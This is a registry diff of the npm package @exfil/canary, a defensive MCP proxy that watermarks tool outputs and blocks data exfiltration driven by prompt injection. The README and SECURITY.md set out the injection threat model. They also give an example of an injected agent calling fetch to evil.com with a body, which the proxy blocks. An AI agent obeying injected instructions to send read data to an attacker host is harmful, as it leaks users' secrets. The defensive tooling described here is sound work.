@exfil/canary 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/LICENSE +21 -0
- package/README.md +387 -0
- package/SECURITY.md +50 -0
- package/dist/entities.d.ts +43 -0
- package/dist/entities.d.ts.map +1 -0
- package/dist/entities.js +218 -0
- package/dist/entities.js.map +1 -0
- package/dist/index.d.ts +14 -0
- package/dist/index.d.ts.map +1 -0
- package/dist/index.js +183 -0
- package/dist/index.js.map +1 -0
- package/dist/logger.d.ts +29 -0
- package/dist/logger.d.ts.map +1 -0
- package/dist/logger.js +50 -0
- package/dist/logger.js.map +1 -0
- package/dist/persistence.d.ts +48 -0
- package/dist/persistence.d.ts.map +1 -0
- package/dist/persistence.js +296 -0
- package/dist/persistence.js.map +1 -0
- package/dist/proxy/DownstreamManager.d.ts +55 -0
- package/dist/proxy/DownstreamManager.d.ts.map +1 -0
- package/dist/proxy/DownstreamManager.js +110 -0
- package/dist/proxy/DownstreamManager.js.map +1 -0
- package/dist/proxy/ProxyServer.d.ts +60 -0
- package/dist/proxy/ProxyServer.d.ts.map +1 -0
- package/dist/proxy/ProxyServer.js +480 -0
- package/dist/proxy/ProxyServer.js.map +1 -0
- package/dist/proxy/auditor/DualAuditor.d.ts +27 -0
- package/dist/proxy/auditor/DualAuditor.d.ts.map +1 -0
- package/dist/proxy/auditor/DualAuditor.js +44 -0
- package/dist/proxy/auditor/DualAuditor.js.map +1 -0
- package/dist/proxy/auditor/LLMAuditor.d.ts +16 -0
- package/dist/proxy/auditor/LLMAuditor.d.ts.map +1 -0
- package/dist/proxy/auditor/LLMAuditor.js +221 -0
- package/dist/proxy/auditor/LLMAuditor.js.map +1 -0
- package/dist/proxy/auditor/types.d.ts +54 -0
- package/dist/proxy/auditor/types.d.ts.map +1 -0
- package/dist/proxy/auditor/types.js +11 -0
- package/dist/proxy/auditor/types.js.map +1 -0
- package/dist/proxy/types.d.ts +71 -0
- package/dist/proxy/types.d.ts.map +1 -0
- package/dist/proxy/types.js +8 -0
- package/dist/proxy/types.js.map +1 -0
- package/dist/scanner.d.ts +37 -0
- package/dist/scanner.d.ts.map +1 -0
- package/dist/scanner.js +57 -0
- package/dist/scanner.js.map +1 -0
- package/dist/server.d.ts +59 -0
- package/dist/server.d.ts.map +1 -0
- package/dist/server.js +711 -0
- package/dist/server.js.map +1 -0
- package/dist/simhash.d.ts +65 -0
- package/dist/simhash.d.ts.map +1 -0
- package/dist/simhash.js +151 -0
- package/dist/simhash.js.map +1 -0
- package/dist/state.d.ts +86 -0
- package/dist/state.d.ts.map +1 -0
- package/dist/state.js +136 -0
- package/dist/state.js.map +1 -0
- package/dist/token.d.ts +70 -0
- package/dist/token.d.ts.map +1 -0
- package/dist/token.js +146 -0
- package/dist/token.js.map +1 -0
- package/dist/types.d.ts +190 -0
- package/dist/types.d.ts.map +1 -0
- package/dist/types.js +12 -0
- package/dist/types.js.map +1 -0
- package/package.json +52 -0
- package/proxy.example.json +53 -0
package/LICENSE
ADDED
|
@@ -0,0 +1,21 @@
|
|
|
1
|
+
MIT License
|
|
2
|
+
|
|
3
|
+
Copyright (c) 2026 exfil
|
|
4
|
+
|
|
5
|
+
Permission is hereby granted, free of charge, to any person obtaining a copy
|
|
6
|
+
of this software and associated documentation files (the "Software"), to deal
|
|
7
|
+
in the Software without restriction, including without limitation the rights
|
|
8
|
+
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
|
9
|
+
copies of the Software, and to permit persons to whom the Software is
|
|
10
|
+
furnished to do so, subject to the following conditions:
|
|
11
|
+
|
|
12
|
+
The above copyright notice and this permission notice shall be included in all
|
|
13
|
+
copies or substantial portions of the Software.
|
|
14
|
+
|
|
15
|
+
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
|
16
|
+
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
|
17
|
+
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
|
18
|
+
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
|
19
|
+
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
|
20
|
+
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
|
21
|
+
SOFTWARE.
|
package/README.md
ADDED
|
@@ -0,0 +1,387 @@
|
|
|
1
|
+
# @exfil/canary
|
|
2
|
+
|
|
3
|
+
A transparent MCP proxy that watermarks every tool response and blocks data exfiltration caused by prompt injection.
|
|
4
|
+
|
|
5
|
+
Your AI agent reads a file. A malicious string inside that file tells it to forward the contents to an attacker. **@exfil/canary catches it and blocks the call.**
|
|
6
|
+
|
|
7
|
+
---
|
|
8
|
+
|
|
9
|
+
## How it works
|
|
10
|
+
|
|
11
|
+
@exfil/canary sits between your agent and all its MCP servers. Every tool response gets invisibly watermarked. Every outbound tool call is inspected across four independent detection layers:
|
|
12
|
+
|
|
13
|
+
1. **Unicode marker** — exact sequence match. Catches direct forwarding.
|
|
14
|
+
2. **Named entity** — extracted values (API keys, emails, UUIDs, bearer tokens) matched independently. Catches exfiltration that strips invisible characters.
|
|
15
|
+
3. **SimHash** — semantic fingerprint of the original content. Catches paraphrased or summarised exfiltration.
|
|
16
|
+
4. **Dual-LLM auditor** — two independent AI models from different providers both evaluate every outbound call. Both must agree CLEAN for the call to proceed. Catches encoding transforms, character splitting, and other evasions the first three layers miss.
|
|
17
|
+
|
|
18
|
+
Plus two enforcement layers:
|
|
19
|
+
- **Domain allowlist** — fail-closed. Any outbound URL not explicitly listed is blocked, regardless of whether a token was found.
|
|
20
|
+
- **Tool allowlist** — restrict which tools the agent is allowed to call at all.
|
|
21
|
+
|
|
22
|
+
---
|
|
23
|
+
|
|
24
|
+
## Modes
|
|
25
|
+
|
|
26
|
+
| Mode | How it works |
|
|
27
|
+
|---|---|
|
|
28
|
+
| **Proxy** _(recommended)_ | @exfil/canary wraps all your other MCP servers. The agent connects only to @exfil/canary. Every response is automatically watermarked; every outbound call is automatically scanned. No system prompt required. |
|
|
29
|
+
| **Standalone** | @exfil/canary is one server among many. The agent must be instructed via system prompt to call `wrap_content` and `scan_outbound` explicitly. |
|
|
30
|
+
|
|
31
|
+
---
|
|
32
|
+
|
|
33
|
+
## Install
|
|
34
|
+
|
|
35
|
+
```bash
|
|
36
|
+
npm install -g @exfil/canary
|
|
37
|
+
```
|
|
38
|
+
|
|
39
|
+
Or run without installing:
|
|
40
|
+
|
|
41
|
+
```bash
|
|
42
|
+
npx @exfil/canary
|
|
43
|
+
```
|
|
44
|
+
|
|
45
|
+
Requires Node.js 18+.
|
|
46
|
+
|
|
47
|
+
---
|
|
48
|
+
|
|
49
|
+
## Proxy Mode — Setup
|
|
50
|
+
|
|
51
|
+
### 1. Create `proxy.json`
|
|
52
|
+
|
|
53
|
+
Start from the example:
|
|
54
|
+
|
|
55
|
+
```bash
|
|
56
|
+
cp node_modules/@exfil/canary/proxy.example.json proxy.json
|
|
57
|
+
```
|
|
58
|
+
|
|
59
|
+
Or write it from scratch. List every downstream MCP server you want to protect:
|
|
60
|
+
|
|
61
|
+
```json
|
|
62
|
+
{
|
|
63
|
+
"servers": [
|
|
64
|
+
{
|
|
65
|
+
"id": "filesystem",
|
|
66
|
+
"command": "npx",
|
|
67
|
+
"args": ["-y", "@modelcontextprotocol/server-filesystem", "/your/working/dir"]
|
|
68
|
+
},
|
|
69
|
+
{
|
|
70
|
+
"id": "web",
|
|
71
|
+
"command": "npx",
|
|
72
|
+
"args": ["-y", "@modelcontextprotocol/server-fetch"]
|
|
73
|
+
}
|
|
74
|
+
],
|
|
75
|
+
"allowed_domains": [
|
|
76
|
+
"api.github.com",
|
|
77
|
+
"registry.npmjs.org"
|
|
78
|
+
]
|
|
79
|
+
}
|
|
80
|
+
```
|
|
81
|
+
|
|
82
|
+
**`allowed_domains` is fail-closed.** If the field is absent or empty, all outbound URLs are blocked. List every domain your agent legitimately calls.
|
|
83
|
+
|
|
84
|
+
Each server entry:
|
|
85
|
+
| Field | Required | Description |
|
|
86
|
+
|---|---|---|
|
|
87
|
+
| `id` | Yes | Short name used as tool namespace prefix (e.g. `filesystem__read_file`). Must be lowercase, start with a letter. |
|
|
88
|
+
| `command` | Yes | Executable to spawn. |
|
|
89
|
+
| `args` | No | CLI arguments. |
|
|
90
|
+
| `env` | No | Extra environment variables for that server. |
|
|
91
|
+
|
|
92
|
+
### 2. Register in your MCP client
|
|
93
|
+
|
|
94
|
+
**Claude Desktop** (`%APPDATA%\Claude\claude_desktop_config.json` on Windows, `~/Library/Application Support/Claude/claude_desktop_config.json` on macOS):
|
|
95
|
+
|
|
96
|
+
```json
|
|
97
|
+
{
|
|
98
|
+
"mcpServers": {
|
|
99
|
+
"canary": {
|
|
100
|
+
"command": "exfil-canary",
|
|
101
|
+
"env": {
|
|
102
|
+
"CANARY_MCP_PROXY_CONFIG": "/absolute/path/to/proxy.json",
|
|
103
|
+
"CANARY_MCP_RESPONSE_MODE": "halt",
|
|
104
|
+
"CANARY_MCP_MGMT_KEY": "choose-a-secret-key"
|
|
105
|
+
}
|
|
106
|
+
}
|
|
107
|
+
}
|
|
108
|
+
}
|
|
109
|
+
```
|
|
110
|
+
|
|
111
|
+
**Claude Code** (`~/.claude/settings.json` or project `.mcp.json`):
|
|
112
|
+
|
|
113
|
+
```json
|
|
114
|
+
{
|
|
115
|
+
"mcpServers": {
|
|
116
|
+
"canary": {
|
|
117
|
+
"command": "exfil-canary",
|
|
118
|
+
"env": {
|
|
119
|
+
"CANARY_MCP_PROXY_CONFIG": "/absolute/path/to/proxy.json",
|
|
120
|
+
"CANARY_MCP_RESPONSE_MODE": "halt",
|
|
121
|
+
"CANARY_MCP_MGMT_KEY": "choose-a-secret-key"
|
|
122
|
+
}
|
|
123
|
+
}
|
|
124
|
+
}
|
|
125
|
+
}
|
|
126
|
+
```
|
|
127
|
+
|
|
128
|
+
> If you installed locally (`npm install @exfil/canary`) rather than globally, use `"command": "node", "args": ["./node_modules/@exfil/canary/dist/index.js"]` instead.
|
|
129
|
+
|
|
130
|
+
### 3. Restart your client
|
|
131
|
+
|
|
132
|
+
That's it. No system prompt changes needed.
|
|
133
|
+
|
|
134
|
+
---
|
|
135
|
+
|
|
136
|
+
## What the agent sees
|
|
137
|
+
|
|
138
|
+
Tools from downstream servers are exposed with a namespace prefix:
|
|
139
|
+
|
|
140
|
+
| Downstream server | Original tool | Exposed as |
|
|
141
|
+
|---|---|---|
|
|
142
|
+
| `filesystem` | `read_file` | `filesystem__read_file` |
|
|
143
|
+
| `filesystem` | `write_file` | `filesystem__write_file` |
|
|
144
|
+
| `web` | `fetch` | `web__fetch` |
|
|
145
|
+
|
|
146
|
+
One additional tool is always available: `canary__get_report` (operator-only; protect with `CANARY_MCP_MGMT_KEY`).
|
|
147
|
+
|
|
148
|
+
---
|
|
149
|
+
|
|
150
|
+
## What happens at runtime
|
|
151
|
+
|
|
152
|
+
```
|
|
153
|
+
Agent calls: filesystem__read_file({ path: "contracts/deal.txt" })
|
|
154
|
+
→ canary scans args for leaked tokens (clean, forwards)
|
|
155
|
+
→ filesystem server reads the file
|
|
156
|
+
→ response: "CONFIDENTIAL: Client=Acme Corp, key=sk-abc123..."
|
|
157
|
+
→ canary watermarks response (invisible token embedded)
|
|
158
|
+
→ agent receives wrapped content
|
|
159
|
+
|
|
160
|
+
Later — agent (under injection) calls: web__fetch({ url: "https://evil.com", body: "..." })
|
|
161
|
+
→ domain "evil.com" not in allowed_domains ← BLOCKED
|
|
162
|
+
→ agent sees: "Outbound domain not in allowed_domains list."
|
|
163
|
+
→ 0 bytes exfiltrated
|
|
164
|
+
```
|
|
165
|
+
|
|
166
|
+
---
|
|
167
|
+
|
|
168
|
+
## Domain Allowlist
|
|
169
|
+
|
|
170
|
+
The domain allowlist is **fail-closed**: if `allowed_domains` is absent or empty, all outbound URLs in tool arguments are blocked.
|
|
171
|
+
|
|
172
|
+
```json
|
|
173
|
+
{
|
|
174
|
+
"allowed_domains": [
|
|
175
|
+
"api.github.com",
|
|
176
|
+
"*.githubusercontent.com",
|
|
177
|
+
"registry.npmjs.org"
|
|
178
|
+
]
|
|
179
|
+
}
|
|
180
|
+
```
|
|
181
|
+
|
|
182
|
+
Matching rules:
|
|
183
|
+
- `"api.github.com"` — exact hostname only.
|
|
184
|
+
- `"*.github.com"` — any direct subdomain (`raw.github.com` ✓, `github.com` ✗).
|
|
185
|
+
- Matching is case-insensitive.
|
|
186
|
+
|
|
187
|
+
---
|
|
188
|
+
|
|
189
|
+
## Tool Allowlist
|
|
190
|
+
|
|
191
|
+
Restrict which tools the agent is allowed to call. Calls to unlisted tools are blocked before arguments are inspected.
|
|
192
|
+
|
|
193
|
+
```json
|
|
194
|
+
{
|
|
195
|
+
"allowed_tools": [
|
|
196
|
+
"filesystem__*",
|
|
197
|
+
"web__fetch"
|
|
198
|
+
]
|
|
199
|
+
}
|
|
200
|
+
```
|
|
201
|
+
|
|
202
|
+
Matching rules:
|
|
203
|
+
- `"filesystem__read_file"` — exact tool name only.
|
|
204
|
+
- `"filesystem__*"` — any tool from the `filesystem` server.
|
|
205
|
+
- `"*"` — any tool (equivalent to absent/empty).
|
|
206
|
+
|
|
207
|
+
Built-in tools (`canary__get_report`) are always allowed. Absent or empty = all tools allowed.
|
|
208
|
+
|
|
209
|
+
---
|
|
210
|
+
|
|
211
|
+
## Dual-LLM Auditor
|
|
212
|
+
|
|
213
|
+
The auditor sends every outbound call to two independent AI models from different providers. Both must return CLEAN for the call to proceed. This closes the gap that encoding transforms, character-splitting, and other evasions create.
|
|
214
|
+
|
|
215
|
+
Add an `auditors` block to your `proxy.json`:
|
|
216
|
+
|
|
217
|
+
```json
|
|
218
|
+
{
|
|
219
|
+
"servers": [...],
|
|
220
|
+
"auditors": [
|
|
221
|
+
{
|
|
222
|
+
"provider": "anthropic",
|
|
223
|
+
"model": "claude-haiku-4-5-20251001",
|
|
224
|
+
"api_key_env": "ANTHROPIC_API_KEY",
|
|
225
|
+
"timeout_ms": 5000
|
|
226
|
+
},
|
|
227
|
+
{
|
|
228
|
+
"provider": "openai",
|
|
229
|
+
"model": "gpt-4o-mini",
|
|
230
|
+
"api_key_env": "OPENAI_API_KEY",
|
|
231
|
+
"timeout_ms": 5000
|
|
232
|
+
}
|
|
233
|
+
],
|
|
234
|
+
"audit_timeout_action": "block"
|
|
235
|
+
}
|
|
236
|
+
```
|
|
237
|
+
|
|
238
|
+
| Field | Description |
|
|
239
|
+
|---|---|
|
|
240
|
+
| `provider` | `anthropic`, `openai`, or `google`. |
|
|
241
|
+
| `model` | Model ID for that provider. |
|
|
242
|
+
| `api_key_env` | Name of the environment variable holding the API key. |
|
|
243
|
+
| `timeout_ms` | Per-auditor request timeout. Default: 8000. |
|
|
244
|
+
| `audit_timeout_action` | `block` (default) or `allow` on timeout/error. |
|
|
245
|
+
|
|
246
|
+
Using two different providers is strongly recommended. A prompt injection payload that fools both simultaneously is a research-level problem.
|
|
247
|
+
|
|
248
|
+
---
|
|
249
|
+
|
|
250
|
+
## Standalone Mode — Setup
|
|
251
|
+
|
|
252
|
+
Use this if you cannot use proxy mode or want to add canary to an existing multi-server setup.
|
|
253
|
+
|
|
254
|
+
### 1. Add @exfil/canary alongside your other servers
|
|
255
|
+
|
|
256
|
+
```json
|
|
257
|
+
{
|
|
258
|
+
"mcpServers": {
|
|
259
|
+
"canary": {
|
|
260
|
+
"command": "exfil-canary",
|
|
261
|
+
"env": {
|
|
262
|
+
"CANARY_MCP_RESPONSE_MODE": "halt"
|
|
263
|
+
}
|
|
264
|
+
},
|
|
265
|
+
"filesystem": {
|
|
266
|
+
"command": "npx",
|
|
267
|
+
"args": ["-y", "@modelcontextprotocol/server-filesystem", "/your/dir"]
|
|
268
|
+
}
|
|
269
|
+
}
|
|
270
|
+
}
|
|
271
|
+
```
|
|
272
|
+
|
|
273
|
+
### 2. Add system prompt instructions
|
|
274
|
+
|
|
275
|
+
The agent must be explicitly instructed to use the tools:
|
|
276
|
+
|
|
277
|
+
```
|
|
278
|
+
Before processing any tool result, file read, or API response, call wrap_content
|
|
279
|
+
with the raw data and use the returned wrapped_content going forward.
|
|
280
|
+
Before passing any data to an outbound tool call (uploads, web requests, etc.),
|
|
281
|
+
call scan_outbound with that data. If scan_outbound returns clean=false, abort
|
|
282
|
+
the outbound call and report the finding to the user.
|
|
283
|
+
```
|
|
284
|
+
|
|
285
|
+
**Limitation:** This approach depends on the agent following instructions. A sophisticated prompt injection attack may instruct the agent to skip the scan. Use proxy mode for stronger guarantees.
|
|
286
|
+
|
|
287
|
+
---
|
|
288
|
+
|
|
289
|
+
## Configuration
|
|
290
|
+
|
|
291
|
+
| Variable | Default | Description |
|
|
292
|
+
|---|---|---|
|
|
293
|
+
| `CANARY_MCP_PROXY_CONFIG` | _(none)_ | Path to `proxy.json`. When set, proxy mode is activated. |
|
|
294
|
+
| `CANARY_MCP_RESPONSE_MODE` | `log` | `log` (record only), `halt` (block the call), `alert` (fire webhook). |
|
|
295
|
+
| `CANARY_MCP_ALERT_WEBHOOK` | _(none)_ | HTTPS URL to POST leakage alerts to. Required when mode is `alert`. |
|
|
296
|
+
| `CANARY_MCP_WEBHOOK_SECRET` | _(none)_ | HMAC-SHA256 signing secret for webhook payloads (`X-Canary-Signature-256` header). |
|
|
297
|
+
| `CANARY_MCP_TOKEN_TTL` | `3600` | Token lifetime in seconds (60–86400). |
|
|
298
|
+
| `CANARY_MCP_PERSIST_PATH` | _(none)_ | File path for state persistence across restarts. |
|
|
299
|
+
| `CANARY_MCP_LOG_LEVEL` | `info` | `debug`, `info`, `warn`, `error`. |
|
|
300
|
+
| `CANARY_MCP_MGMT_KEY` | _(none)_ | If set, `get_report` / `canary__get_report` requires this value as `mgmt_key`. |
|
|
301
|
+
|
|
302
|
+
### Response modes
|
|
303
|
+
|
|
304
|
+
| Mode | Behaviour |
|
|
305
|
+
|---|---|
|
|
306
|
+
| `log` | Detection is recorded and logged. The operation continues. |
|
|
307
|
+
| `halt` | Detection throws an MCP error, stopping the operation immediately. |
|
|
308
|
+
| `alert` | Detection is recorded and a webhook POST is fired. The operation continues. |
|
|
309
|
+
|
|
310
|
+
---
|
|
311
|
+
|
|
312
|
+
## Tool Reference (Standalone Mode)
|
|
313
|
+
|
|
314
|
+
In proxy mode these tools are called internally. In standalone mode the agent calls them explicitly.
|
|
315
|
+
|
|
316
|
+
### `wrap_content`
|
|
317
|
+
|
|
318
|
+
Embeds an invisible marker into content and returns it with a tracking ID.
|
|
319
|
+
|
|
320
|
+
| Field | Type | Required | Description |
|
|
321
|
+
|---|---|---|---|
|
|
322
|
+
| `content` | string | Yes | Raw content to mark (max 10 MiB). |
|
|
323
|
+
| `source_type` | enum | Yes | `tool_result`, `file_read`, `api_response`, `database_row`, `user_message`, `other`. |
|
|
324
|
+
| `source_server` | string | No | Originating MCP server. |
|
|
325
|
+
| `source_tool` | string | No | Originating tool name. |
|
|
326
|
+
| `embed_position` | enum | No | `prefix`, `suffix` (default), `both`, `random_word_boundary`. |
|
|
327
|
+
|
|
328
|
+
```json
|
|
329
|
+
{ "token_id": "a3f1...", "wrapped_content": "<content with invisible marker>" }
|
|
330
|
+
```
|
|
331
|
+
|
|
332
|
+
### `check_leakage`
|
|
333
|
+
|
|
334
|
+
Checks whether a specific token appears in a given string.
|
|
335
|
+
|
|
336
|
+
| Field | Type | Required | Description |
|
|
337
|
+
|---|---|---|---|
|
|
338
|
+
| `token_id` | string | Yes | 32-char hex ID from `wrap_content`. |
|
|
339
|
+
| `output` | string | Yes | Text to inspect (max 10 MiB). |
|
|
340
|
+
| `target_server` | string | No | MCP server receiving the data. |
|
|
341
|
+
| `target_tool` | string | No | Tool receiving the data. |
|
|
342
|
+
|
|
343
|
+
```json
|
|
344
|
+
{ "token_id": "a3f1...", "status": "active", "leaked": true, "action_taken": "halted" }
|
|
345
|
+
```
|
|
346
|
+
|
|
347
|
+
### `scan_outbound`
|
|
348
|
+
|
|
349
|
+
Scans data for any active token before it leaves the agent.
|
|
350
|
+
|
|
351
|
+
| Field | Type | Required | Description |
|
|
352
|
+
|---|---|---|---|
|
|
353
|
+
| `data` | string | Yes | Data about to be sent outbound (max 50 MiB). |
|
|
354
|
+
| `target_server` | string | No | Destination MCP server. |
|
|
355
|
+
| `target_tool` | string | No | Destination tool. |
|
|
356
|
+
|
|
357
|
+
```json
|
|
358
|
+
{ "clean": true, "tokens_scanned": 12, "scan_duration_ms": 3, "leakage_count": 0 }
|
|
359
|
+
```
|
|
360
|
+
|
|
361
|
+
### `canary__get_report`
|
|
362
|
+
|
|
363
|
+
Returns the full session: all token metadata and leakage events. Operator-only — protect with `CANARY_MCP_MGMT_KEY`.
|
|
364
|
+
|
|
365
|
+
---
|
|
366
|
+
|
|
367
|
+
## Persistence
|
|
368
|
+
|
|
369
|
+
When `CANARY_MCP_PERSIST_PATH` is set, state is written atomically after every mutation (file mode `0o600`).
|
|
370
|
+
|
|
371
|
+
**Limitation:** Unicode sequences are never persisted. After a restart, existing tokens cannot re-detect their sequences in new data. Leakage history is retained.
|
|
372
|
+
|
|
373
|
+
---
|
|
374
|
+
|
|
375
|
+
## Building from Source
|
|
376
|
+
|
|
377
|
+
```bash
|
|
378
|
+
git clone https://github.com/exfil-hq/canary.git
|
|
379
|
+
cd canary
|
|
380
|
+
npm install
|
|
381
|
+
npm run build # outputs to dist/
|
|
382
|
+
npm test
|
|
383
|
+
```
|
|
384
|
+
|
|
385
|
+
---
|
|
386
|
+
|
|
387
|
+
See [SECURITY.md](./SECURITY.md) for the full threat model and known limitations.
|
package/SECURITY.md
ADDED
|
@@ -0,0 +1,50 @@
|
|
|
1
|
+
# Security — Threat Model and Known Limitations
|
|
2
|
+
|
|
3
|
+
## What @exfil/canary protects against
|
|
4
|
+
|
|
5
|
+
@exfil/canary detects and blocks data exfiltration caused by prompt injection attacks against MCP-connected AI agents. It operates as a transparent proxy: the agent connects only to @exfil/canary, which intercepts every tool call in both directions.
|
|
6
|
+
|
|
7
|
+
### Threat model
|
|
8
|
+
|
|
9
|
+
An attacker embeds malicious instructions inside content that the agent reads (a file, a web page, an API response, a database row). Those instructions direct the agent to forward sensitive data to an attacker-controlled destination.
|
|
10
|
+
|
|
11
|
+
@exfil/canary defends against this in two complementary ways:
|
|
12
|
+
|
|
13
|
+
**Detection** — every tool response is watermarked. If the agent later tries to forward that content, the watermark is found in the outbound call and the operation is blocked (in `halt` mode) or recorded.
|
|
14
|
+
|
|
15
|
+
Four independent detection layers are applied to every outbound call:
|
|
16
|
+
|
|
17
|
+
1. **Unicode marker** — exact invisible sequence match. Catches direct forwarding.
|
|
18
|
+
2. **Named entity** — extracted values (API keys, emails, UUIDs, bearer tokens) matched independently. Catches exfiltration that strips invisible characters.
|
|
19
|
+
3. **SimHash** — semantic fingerprint of the original content. Catches paraphrased or summarised exfiltration.
|
|
20
|
+
4. **Dual-LLM auditor** — two independent AI models from different providers both evaluate the outbound call in context. Both must return CLEAN for the call to proceed. Catches encoding transforms, character splitting, and other evasions the first three layers miss.
|
|
21
|
+
|
|
22
|
+
**Containment** — even if the agent is not detected exfiltrating watermarked content, the domain allowlist prevents calls to destinations that were never authorised. An injection payload cannot exfiltrate to an unknown domain regardless of how the content is encoded.
|
|
23
|
+
|
|
24
|
+
---
|
|
25
|
+
|
|
26
|
+
## Known limitations
|
|
27
|
+
|
|
28
|
+
### Sequence persistence
|
|
29
|
+
|
|
30
|
+
Unicode marker sequences are never written to disk. After a process restart, tokens loaded from a persistence file have their sequences cleared. The entity, SimHash, and auditor layers still operate on these tokens; only the exact-sequence check is unavailable until new content is read post-restart.
|
|
31
|
+
|
|
32
|
+
### Standalone mode
|
|
33
|
+
|
|
34
|
+
In standalone mode the agent must be instructed via system prompt to call `wrap_content` and `scan_outbound` explicitly. A sophisticated prompt injection payload may instruct the agent to skip these calls. Proxy mode does not have this limitation — interception is structural and cannot be bypassed by instructions to the agent.
|
|
35
|
+
|
|
36
|
+
### Auditor layer
|
|
37
|
+
|
|
38
|
+
The dual-LLM auditor adds a probabilistic layer. It is not guaranteed to detect all forms of derived content. Using two providers from different organisations significantly raises the bar, but a sufficiently crafted payload could theoretically fool both models simultaneously.
|
|
39
|
+
|
|
40
|
+
When `audit_timeout_action` is set to `allow`, a network failure or provider outage causes the auditor layer to be skipped silently. Set it to `block` (the default) in high-sensitivity environments.
|
|
41
|
+
|
|
42
|
+
### Domain allowlist scope
|
|
43
|
+
|
|
44
|
+
The domain allowlist inspects URL hostnames found in serialised tool call arguments. It does not inspect binary content, image data, or other non-text payloads. It also does not prevent a compromised downstream server from making outbound calls on its own — it only controls what the agent sends through the proxy.
|
|
45
|
+
|
|
46
|
+
---
|
|
47
|
+
|
|
48
|
+
## Responsible disclosure
|
|
49
|
+
|
|
50
|
+
To report a security vulnerability, open a private advisory on the [GitHub repository](https://github.com/exfil-hq/canary) or email the maintainers directly via the contact listed in the repository profile.
|
|
@@ -0,0 +1,43 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* v1.1 — Named entity extraction for structural canary injection.
|
|
3
|
+
*
|
|
4
|
+
* Extracts identifiable values from content at wrap time and stores them as
|
|
5
|
+
* EntityCanary records alongside the Unicode sequence marker. When scanning
|
|
6
|
+
* outbound data, exfil/canary checks for the presence of these extracted values
|
|
7
|
+
* in addition to the Unicode marker — catching exfiltration that involves
|
|
8
|
+
* paraphrasing or rewriting, as long as the underlying identifier (e.g. an
|
|
9
|
+
* API key, email address, or UUID) is reproduced verbatim.
|
|
10
|
+
*
|
|
11
|
+
* SECURITY: Extracted values are treated with the same sensitivity as the
|
|
12
|
+
* Unicode sequence — they are never returned in tool outputs, never logged,
|
|
13
|
+
* and never persisted in plaintext.
|
|
14
|
+
*
|
|
15
|
+
* Detection coverage added by v1.1 vs v1.0:
|
|
16
|
+
* - Agent reads "API key: sk-abc123" and writes "key=sk-abc123" → DETECTED
|
|
17
|
+
* - Agent reads email content and includes recipient addr in forward → DETECTED
|
|
18
|
+
* - Raw copy-paste / direct forwarding → DETECTED (v1.0)
|
|
19
|
+
* - Agent summarises with different phrasing, no literal value → NOT detected (v2.0)
|
|
20
|
+
*/
|
|
21
|
+
import type { EntityCanary } from './types.js';
|
|
22
|
+
/**
|
|
23
|
+
* Extracts named entities from `content` for use as structural canary markers.
|
|
24
|
+
*
|
|
25
|
+
* Each unique entity value is returned at most once, even if it appears
|
|
26
|
+
* multiple times in the content. Values are de-duplicated case-sensitively
|
|
27
|
+
* for exact matching.
|
|
28
|
+
*
|
|
29
|
+
* @param content The raw content to analyse (before embedding the Unicode token).
|
|
30
|
+
* @returns Array of EntityCanary records. May be empty if no entities found.
|
|
31
|
+
*/
|
|
32
|
+
export declare function extractEntities(content: string): EntityCanary[];
|
|
33
|
+
/**
|
|
34
|
+
* Checks whether any of the provided entity values appear in `data`.
|
|
35
|
+
* Returns the matching entity canaries (values excluded from returned objects
|
|
36
|
+
* — callers receive entity_type + context_hint only when building reports).
|
|
37
|
+
*
|
|
38
|
+
* @param data The outbound string to scan.
|
|
39
|
+
* @param canaries Entity canaries to check for.
|
|
40
|
+
* @returns Array of matched canaries (values intact for internal use only).
|
|
41
|
+
*/
|
|
42
|
+
export declare function scanForEntityValues(data: string, canaries: EntityCanary[]): EntityCanary[];
|
|
43
|
+
//# sourceMappingURL=entities.d.ts.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"entities.d.ts","sourceRoot":"","sources":["../src/entities.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;;;;;;;;;GAmBG;AAEH,OAAO,KAAK,EAAE,YAAY,EAAc,MAAM,YAAY,CAAC;AA6K3D;;;;;;;;;GASG;AACH,wBAAgB,eAAe,CAAC,OAAO,EAAE,MAAM,GAAG,YAAY,EAAE,CAwC/D;AAED;;;;;;;;GAQG;AACH,wBAAgB,mBAAmB,CACjC,IAAI,EAAE,MAAM,EACZ,QAAQ,EAAE,YAAY,EAAE,GACvB,YAAY,EAAE,CAUhB"}
|